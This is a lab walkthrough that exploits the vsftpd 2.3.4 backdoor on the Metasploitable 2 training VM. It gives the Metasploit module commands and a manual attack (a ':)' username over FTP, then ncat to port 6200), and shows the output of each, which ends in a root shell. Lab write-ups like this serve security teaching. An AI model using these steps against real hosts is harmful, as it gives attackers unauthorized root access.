Metasploitable 2: Exploiting FTP server vsftpd backdoor

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4

In the Metasploit console:

msf > search vsftpd

Matching Modules
================

Name                                  Disclosure Date          Rank       Description
----                                  ---------------          ----       -----------
exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03 00:00:00 UTC  excellent  VSFTPD v2.3.4 Backdoor Command Execution

Then:

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show payloads

Compatible Payloads
===================

Name               Disclosure Date  Rank    Description
----               ---------------  ----    -----------
cmd/unix/interact                   normal  Unix Command, Interact with Established Connection

msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  21               yes       The target port

Exploit target:

Id  Name
--  ----
0   Automatic

And to the exploit:

msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.1.103
RHOST => 192.168.1.103
msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.78:39930 -> 192.168.1.103:6200) at 2013-11-02 10:15:45 +0000

And to prove the exploit worked, in the new session:

whoami
root
Root access obtained.

This exploit relies on a backdoor that was slipped into the vsftpd 2.3.4 source tarball distributed from the project's download site. When the username supplied at login contains the characters :) (a smiley face), the injected code binds a listening socket on TCP port 6200 and hands the first connection that arrives a /bin/sh. The check runs in vsftpd's privileged parent process, which is why the shell comes back as uid=0(root) rather than as the unprivileged ftp user.

Now that we know how the backdoor is triggered, we can exploit it by hand from a terminal, without Metasploit. First make an FTP connection and supply a username containing :) :

:~# ftp 192.168.1.103
Connected to 192.168.1.103.
220 (vsFTPd 2.3.4)
Name (192.168.1.103:root): whatever:)
331 Please specify the password.
Password:

We can use any password; it is never checked. After it is entered the FTP session appears to hang, because the server process is now blocked waiting for a connection on port 6200. Leave this session as it is and continue in a second terminal.

Then, from the second terminal, connect to port 6200 with Ncat:

:~# ncat 192.168.1.103 6200
whoami
root

Here's a Security Tube video demonstrating the above. It's worth viewing the Security Tube page, which details the injected backdoor code.

And here's another video, using Netcat instead of Ncat:
